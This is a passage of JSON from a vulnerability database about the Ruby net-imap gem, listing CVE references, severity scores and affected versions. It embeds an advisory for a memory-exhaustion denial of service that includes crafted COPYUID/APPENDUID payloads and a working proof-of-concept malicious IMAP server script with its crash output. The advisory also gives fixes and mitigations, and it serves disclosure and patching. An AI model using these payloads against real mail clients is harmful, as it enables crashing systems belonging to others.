""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:57:16Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:57:16Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42258.yml","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42258.yml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42258","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42258"},{"reference_url":"https://github.com/advisories/GHSA-75xq-5h9v-w6px","reference_id":"GHSA-75xq-5h9v-w6px","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-75xq-5h9v-w6px"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px","reference_id":"GHSA-75xq-5h9v-w6px","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:57:16Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1089665?format=json","purl":"pkg:gem/net-imap@0.4.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.24"},{"url":"http://public2.vulnerablecode.io/api/packages/1089660?format=json","purl":"pkg:gem/net-imap@0.5.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.14"},{"url":"http://public2.vulnerablecode.io/api/packages/1089663?format=json","purl":"pkg:gem/net-imap@0.6.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.6.4"}],"aliases":["CVE-2026-42258","GHSA-75xq-5h9v-w6px"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-unx7-72n1-2bd4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/26875?format=json","vulnerability_id":"VCID-wyjh-cuuy-zbeb","summary":"Possible DoS by memory exhaustion in net-imap\n### Summary\nThere is a possibility for denial of service by memory exhaustion in `net-imap`'s response parser.  At any time while the client is connected, a malicious server can send  can send highly compressed `uid-set` data which is automatically read by the client's receiver thread.  The response parser uses `Range#to_a` to convert the `uid-set` data into arrays of integers, with no limitation on the expanded size of the ranges.\n\n### Details\nIMAP's `uid-set` and `sequence-set` formats can compress ranges of numbers, for example: `\"1,2,3,4,5\"` and `\"1:5\"` both represent the same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or `COPYUID` response codes, it expands each `uid-set` into an array of integers.  On a 64 bit system, these arrays will expand to 8 bytes for each number in the set.  A malicious IMAP server may send specially crafted `APPENDUID` or `COPYUID` responses with very large `uid-set` ranges.\n\nThe `Net::IMAP` client parses each server response in a separate thread, as soon as each responses is received from the server.  This attack works even when the client does not handle the `APPENDUID` or `COPYUID` responses.\n\nMalicious inputs:\n\n```ruby\n# 40 bytes expands to ~1.6GB:\n\"* OK [COPYUID 1 1:99999999 1:99999999]\\r\\n\"\n\n# Worst *valid* input scenario (using uint32 max),\n# 44 bytes expands to 64GiB:\n\"* OK [COPYUID 1 1:4294967295 1:4294967295]\\r\\n\"\n\n# Numbers must be non-zero uint32, but this isn't validated.  Arrays larger than\n# UINT32_MAX can be created.  For example, the following would theoretically\n# expand to almost 800 exabytes:\n\"* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\\r\\n\"\n```\n\nSimple way to test this:\n```ruby\nrequire \"net/imap\"\n\ndef test(size)\n  input = \"A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\\r\\n\"\n  parser = Net::IMAP::ResponseParser.new\n  parser.parse input\nend\n\ntest(99_999_999)\n```\n\n### Fixes\n\n#### Preferred Fix, minor API changes\nUpgrade to v0.4.19, v0.5.6, or higher, and configure:\n```ruby\n# globally\nNet::IMAP.config.parser_use_deprecated_uidplus_data = false\n# per-client\nimap = Net::IMAP.new(hostname, ssl: true,\n                               parser_use_deprecated_uidplus_data: false)\nimap.config.parser_use_deprecated_uidplus_data = false\n```\n\nThis replaces `UIDPlusData` with `AppendUIDData` and `CopyUIDData`.  These classes store their UIDs as `Net::IMAP::SequenceSet` objects (_not_ expanded into arrays of integers).  Code that does not handle `APPENDUID` or `COPYUID` responses will not notice any difference.  Code that does handle these responses _may_ need to be updated.  See the documentation for [UIDPlusData](https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html), [AppendUIDData](https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html) and [CopyUIDData](https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html).\n\nFor v0.3.8, this option is not available.\nFor v0.4.19, the default value is `true`.\nFor v0.5.6, the default value is `:up_to_max_size`.\nFor v0.6.0, the only allowed value will be `false`  _(`UIDPlusData` will be removed from v0.6)_.\n\n#### Mitigation, backward compatible API\nUpgrade to v0.3.8, v0.4.19, v0.5.6, or higher.\n\nFor backward compatibility, `uid-set` can still be expanded into an array, but a maximum limit will be applied.\n\nAssign `config.parser_max_deprecated_uidplus_data_size` to set the maximum `UIDPlusData` UID set size.\nWhen `config.parser_use_deprecated_uidplus_data == true`, larger sets will raise `Net::IMAP::ResponseParseError`.\nWhen  `config.parser_use_deprecated_uidplus_data == :up_to_max_size`, larger sets will use `AppendUIDData` or `CopyUIDData`.\n\nFor v0.3,8, this limit is _hard-coded_ to 10,000, and larger sets will always raise `Net::IMAP::ResponseParseError`.\nFor v0.4.19, the limit defaults to 1000.\nFor v0.5.6, the limit defaults to 100.\nFor v0.6.0, the limit will be ignored  _(`UIDPlusData` will be removed from v0.6)_.\n\n#### Please Note: unhandled responses\nIf the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses.  However, `net-imap` has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses.  _This is not significantly different from connecting to a trusted server with a long-lived connection._  To limit the maximum number of retained responses, a simple handler might look something like the following:\n\n  ```ruby\n  limit = 1000\n  imap.add_response_handler do |resp|\n    next unless resp.respond_to?(:name) && resp.respond_to?(:data)\n    name = resp.name\n    code = resp.data.code&.name if resp.data.respond_to?(:code)\n    if Net::IMAP::VERSION > \"0.4.0\"\n      imap.responses(name) { _1.slice!(0...-limit) }\n      imap.responses(code) { _1.slice!(0...-limit) }\n    else\n      imap.responses(name).slice!(0...-limit)\n      imap.responses(code).slice!(0...-limit)\n    end\n  end\n  ```\n\n### Proof of concept\n\nSave the following to a ruby file (e.g: `poc.rb`) and make it executable:\n```ruby\n#!/usr/bin/env ruby\nrequire 'socket'\nrequire 'net/imap'\n\nif !defined?(Net::IMAP.config)\n  puts \"Net::IMAP.config is not available\"\nelsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data)\n  puts \"Net::IMAP.config.parser_use_deprecated_uidplus_data is not available\"\nelse\n  Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size\n  puts \"Updated parser_use_deprecated_uidplus_data to :up_to_max_size\"\nend\n\nsize = Integer(ENV[\"UID_SET_SIZE\"] || 2**32-1)\n\ndef server_addr\n  Addrinfo.tcp(\"localhost\", 0).ip_address\nend\n\ndef create_tcp_server\n  TCPServer.new(server_addr, 0)\nend\n\ndef start_server\n  th = Thread.new do\n    yield\n  end\n  sleep 0.1 until th.stop?\nend\n\ndef copyuid_response(tag: \"*\", size: 2**32-1, text: \"too large?\")\n  \"#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\\r\\n\"\nend\n\ndef appenduid_response(tag: \"*\", size: 2**32-1, text: \"too large?\")\n  \"#{tag} OK [APPENDUID 1 1:#{size}] #{text}\\r\\n\"\nend\n\nserver = create_tcp_server\nport = server.addr[1]\nputs \"Server started on port #{port}\"\n\n# server\nstart_server do\n  sock = server.accept\n  begin\n    sock.print \"* OK test server\\r\\n\"\n    cmd = sock.gets(\"\\r\\n\", chomp: true)\n    tag = cmd.match(/\\A(\\w+) /)[1]\n    puts \"Received: #{cmd}\"\n\n    malicious_response = appenduid_response(size:)\n    puts \"Sending: #{malicious_response.chomp}\"\n    sock.print malicious_response\n\n    malicious_response = copyuid_response(size:)\n    puts \"Sending: #{malicious_response.chomp}\"\n    sock.print malicious_response\n    sock.print \"* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\\r\\n\"\n    sock.print \"#{tag} OK CAPABILITY completed\\r\\n\"\n\n    cmd = sock.gets(\"\\r\\n\", chomp: true)\n    tag = cmd.match(/\\A(\\w+) /)[1]\n    puts \"Received: #{cmd}\"\n    sock.print \"* BYE If you made it this far, you passed the test!\\r\\n\"\n    sock.print \"#{tag} OK LOGOUT completed\\r\\n\"\n  rescue Exception => ex\n    puts \"Error in server: #{ex.message} (#{ex.class})\"\n  ensure\n    sock.close\n    server.close\n  end\nend\n\n# client\nbegin\n  puts \"Client connecting,..\"\n  imap = Net::IMAP.new(server_addr, port: port)\n  puts \"Received capabilities: #{imap.capability}\"\n  pp responses: imap.responses\n  imap.logout\nrescue Exception => ex\n  puts \"Error in client: #{ex.message} (#{ex.class})\"\n  puts ex.full_message\nensure\n  imap.disconnect if imap\nend\n```\n\nUse `ulimit` to limit the process's virtual memory.  The following example limits virtual memory to 1GB:\n```console\n$ ( ulimit -v 1000000 && exec ./poc.rb )\nServer started on port 34291\nClient connecting,..\nReceived: RUBY0001 CAPABILITY\nSending: * OK [APPENDUID 1 1:4294967295] too large?\nSending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large?\nError in server: Connection reset by peer @ io_fillbuf - fd:9  (Errno::ECONNRESET)\nError in client: failed to allocate memory (NoMemoryError)\n/gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError)\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command'\n        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'\n        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command'\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability'\n        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'\n        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability'\n        from /workspace/poc.rb:70:in '<main>'\n```","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-25186","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33317","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32952","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32872","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32846","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32936","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32897","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32828","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33222","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33238","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33199","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3335","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33182","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33225","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33259","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3294","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33016","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33263","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33033","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33179","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33215","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-25186"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35"},{"reference_url":"https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3"},{"reference_url":"https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":""},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-25186","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-25186"},{"reference_url":"https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html"},{"reference_url":"https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html"},{"reference_url":"https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791","reference_id":"1103791","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2344680","reference_id":"2344680","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2344680"},{"reference_url":"https://github.com/advisories/GHSA-7fc5-f82f-cx69","reference_id":"GHSA-7fc5-f82f-cx69","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7fc5-f82f-cx69"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:10217","reference_id":"RHSA-2025:10217","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:10217"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3906","reference_id":"RHSA-2025:3906","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3906"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4493","reference_id":"RHSA-2025:4493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8131","reference_id":"RHSA-2025:8131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8131"},{"reference_url":"https://usn.ubuntu.com/7418-1/","reference_id":"USN-7418-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7418-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69492?format=json","purl":"pkg:gem/net-imap@0.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-5zsx-353j-8kax"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.8"},{"url":"http://public2.vulnerablecode.io/api/packages/69493?format=json","purl":"pkg:gem/net-imap@0.4.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-5zsx-353j-8kax"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.19"},{"url":"http://public2.vulnerablecode.io/api/packages/69494?format=json","purl":"pkg:gem/net-imap@0.5.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-5zsx-353j-8kax"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.6"}],"aliases":["CVE-2025-25186","GHSA-7fc5-f82f-cx69"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wyjh-cuuy-zbeb"}],"fixing_vulnerabilities":[],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.2"}